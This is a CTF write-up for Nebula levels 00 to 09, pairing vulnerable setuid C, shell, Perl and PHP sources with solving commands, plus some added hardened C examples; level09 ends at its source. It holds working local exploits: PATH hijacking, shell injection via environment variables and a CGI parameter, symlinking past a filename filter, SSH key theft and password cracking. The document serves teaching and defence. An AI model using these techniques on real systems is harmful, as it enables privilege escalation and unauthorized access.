Nebula

Nebula Writeup

level00

About

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Key Points

  • find
  • uid

Writeup

  • Step 1
level00@nebula:~$ id flag00
uid=999(flag00) gid=999(flag00) groups=999(flag00)
  • Step 2
level00@nebula:~$ find / -uid 999 2>/dev/null
/bin/.../flag00
/home/flag00
/home/flag00/.bash_logout
/home/flag00/.bashrc
/home/flag00/.profile
/rofs/bin/.../flag00
/rofs/home/flag00
/rofs/home/flag00/.bash_logout
/rofs/home/flag00/.bashrc
/rofs/home/flag00/.profile
  • Step 3
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

level01

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

SourceCode

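#define _GNU_SOURCE /* for setresgid()/setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* make the real and saved ids match the effective (flag01) ids */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* env looks up "echo" through the caller-controlled PATH */
    system("/usr/bin/env echo and now what?");
}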

Key Points

Writeup

  • Step 1

level01@nebula:~$ ln -s /bin/getflag echo

  • Step 2

level01@nebula:~$ export PATH=/home/level01:$PATH

  • Step 3
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account

level02

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

SourceCode

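#define _GNU_SOURCE /* for asprintf() and setresgid()/setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    char *buffer;
    gid_t gid;
    uid_t uid;

    /* make the real and saved ids match the effective (flag02) ids */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    buffer = NULL;

    /* USER comes from the caller's environment and is passed to a shell */
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    printf("about to call system(\"%s\")\n", buffer);
    system(buffer);
}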

Key Points

  • Environment variables

Writeups

  • Step 1

level02@nebula:~$ export USER="&& /bin/getflag"
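
A hardened counterpart to the level01 and level02 programs, added here as an example and not part of the original writeup or the Nebula sources: it validates the user name against an allow-list and runs /bin/echo by absolute path through execve with a fixed environment, so neither PATH nor shell metacharacters decide what executes. The function names and the 32-character limit are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list: 1..32 characters from [A-Za-z0-9_-], so no shell metacharacters. */
int is_safe_username(const char *s)
{
    size_t n;
    if (s == NULL || *s == '\0')
        return 0;
    for (n = 0; s[n] != '\0'; n++)
        if (n >= 32 || !(isalnum((unsigned char)s[n]) || s[n] == '_' || s[n] == '-'))
            return 0;
    return 1;
}

/* Run /bin/echo by absolute path with an explicit argv and a fixed
 * environment: no shell parses the text and the caller's PATH is ignored.
 * Returns the child's exit status, or -1 if the name is rejected or on error. */
int echo_user_hardened(const char *user)
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    char msg[64];
    int status;
    pid_t pid;
    if (!is_safe_username(user))
        return -1;
    snprintf(msg, sizeof(msg), "%s is cool", user);
    char *const argv[] = { "/bin/echo", msg, NULL };
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("%d\n", echo_user_hardened("level02"));         /* name accepted */
    printf("%d\n", echo_user_hardened("&& /bin/getflag")); /* name rejected */
    return 0;
}
```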

level03

About

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

SourceCode

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done

Key Points

Writeups

  • Create an executable script under /home/flag03/writable.d
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag > /tmp/flag" > test.sh

PS:

  • sudo ls /var/spool/cron/crontabs

level04

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

SourceCode

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h> /* for err() */

int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;

    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* the check is on the path string only, not on the file it resolves to */
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }

    rc = read(fd, buf, sizeof(buf));
    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }

    write(1, buf, rc);
}

Key Points

  • strstr

Writeups

  • Step 1
level04@nebula:/tmp$ ln -s /home/flag04/token flag04
level04@nebula:/tmp$ /home/flag04/flag04 /tmp/flag04
06508b5e-8909-4f38-b630-fdb148a848a2
  • Step 2
nebula@nebula:~$ su flag04
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
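
The strstr test in level04 inspects the path string, not the file that ends up being opened. The following added example (not from the original writeup or the Nebula sources; the function names and the temp-directory fixture are constructed) compares the opened file's device and inode with the protected file instead, which also covers hard links.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Identity check: open first, then compare the opened file's device and
 * inode with the protected file. Returns an fd, or -1 if refused or on error. */
int open_unless_protected(const char *path, const char *protected_path)
{
    struct stat want, got;
    int fd = open(path, O_RDONLY);
    if (fd != -1 && (fstat(fd, &got) != 0 ||
        (stat(protected_path, &want) == 0 &&
         want.st_dev == got.st_dev && want.st_ino == got.st_ino))) {
        close(fd); /* fail closed: same object reached under another name */
        fd = -1;
    }
    return fd;
}

/* Constructed fixture in a temp directory. Result bits: 1 = the level04 name
 * check lets the symlink through, 2 = identity check refuses the symlink,
 * 4 = refuses a hard link, 8 = still allows an unrelated file (/dev/null). */
int demo(void)
{
    char dir[] = "/tmp/l04XXXXXX", tok[64], sym[64], hard[64];
    int fd, r = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(tok, sizeof tok, "%s/token", dir);
    snprintf(sym, sizeof sym, "%s/sym", dir);
    snprintf(hard, sizeof hard, "%s/hard", dir);
    fd = open(tok, O_CREAT | O_WRONLY, 0600);
    if (fd == -1 || symlink(tok, sym) != 0 || link(tok, hard) != 0)
        return -1;
    close(fd);
    if (strstr(sym, "token") == NULL) r |= 1;   /* the original check */
    if (open_unless_protected(sym, tok) == -1) r |= 2;
    if (open_unless_protected(hard, tok) == -1) r |= 4;
    if ((fd = open_unless_protected("/dev/null", tok)) != -1) { r |= 8; close(fd); }
    unlink(sym); unlink(hard); unlink(tok); rmdir(dir);
    return r;
}

int main(void) { printf("%d\n", demo()); return 0; }
```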

level05

About

Check the flag05 home directory. You are looking for weak directory permissions

To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Key Points

  • ssh

Writeups

  • Step 1

level05@nebula:/home/flag05/.backup$ tar xvf backup-19072011.tgz -C /tmp/

  • Step 2
level05@nebula:~$ cp -r /tmp/.ssh/ ~
level05@nebula:~$ ssh flag05@localhost

level06

About

The flag06 account credentials came from a legacy unix system.

To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Key Points

Writeups

  • Step 1

Copy out the /etc/passwd file

  • Step 2
➜ Desktop john passwd
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (flag06)
1g 0:00:00:00 DONE 2/3 (2017-06-25 15:41) 25.00g/s 18750p/s 18750c/s 18750C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

level07

About

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

SourceCode

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");
}

# check if Host set. if not, display normal page, etc

ping(param("Host"))

Key Points

Writeups

127.0.0.1;getflag

level08

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Key Points

  • 0x7f -> DEL (each 0x7f byte deletes the previously typed character)

Writeups

000000D5 01 .
000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord:
000000B9 62 b
000000BA 61 a
000000BB 63 c
000000BC 6b k
000000BD 64 d
000000BE 6f o
000000BF 6f o
000000C0 72 r
000000C1 7f .
000000C2 7f .
000000C3 7f .
000000C4 30 0
000000C5 30 0
000000C6 52 R
000000C7 6d m
000000C8 38 8
000000C9 7f .
000000CA 61 a
000000CB 74 t
000000CC 65 e
000000CD 0d .

Password is backd00Rmate
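
The DEL handling can be replayed mechanically. This added example (not part of the original writeup; the function name is hypothetical) applies the keystroke bytes from the dump above the way a terminal line editor would.

```c
#include <stdio.h>
#include <string.h>

/* Replay captured keystrokes as a line editor would: 0x7f (DEL) and 0x08 (BS)
 * erase the previous character, CR or LF ends the line. Writes the resulting
 * line to out (NUL-terminated) and returns its length. */
size_t replay_keystrokes(const unsigned char *in, size_t n, char *out, size_t cap)
{
    size_t len = 0, i;
    if (cap == 0)
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = in[i];
        if (c == '\r' || c == '\n')
            break;
        if (c == 0x7f || c == 0x08) {
            if (len > 0)
                len--;              /* erase; ignored at start of line */
        } else if (len + 1 < cap) {
            out[len++] = (char)c;   /* keep room for the terminator */
        }
    }
    out[len] = '\0';
    return len;
}

/* Keystroke bytes copied from the dump above (offsets B9..CD). */
static const unsigned char captured[] = {
    0x62, 0x61, 0x63, 0x6b, 0x64, 0x6f, 0x6f, 0x72, 0x7f, 0x7f, 0x7f,
    0x30, 0x30, 0x52, 0x6d, 0x38, 0x7f, 0x61, 0x74, 0x65, 0x0d
};

int main(void)
{
    char line[64];
    replay_keystrokes(captured, sizeof captured, line, sizeof line);
    puts(line);
    return 0;
}
```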

level09

About

There’s a C setuid wrapper for some vulnerable PHP code…

To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.

SourceCode

<?php

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);

    return $email;
}

function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);

    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);

    return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>

Key Points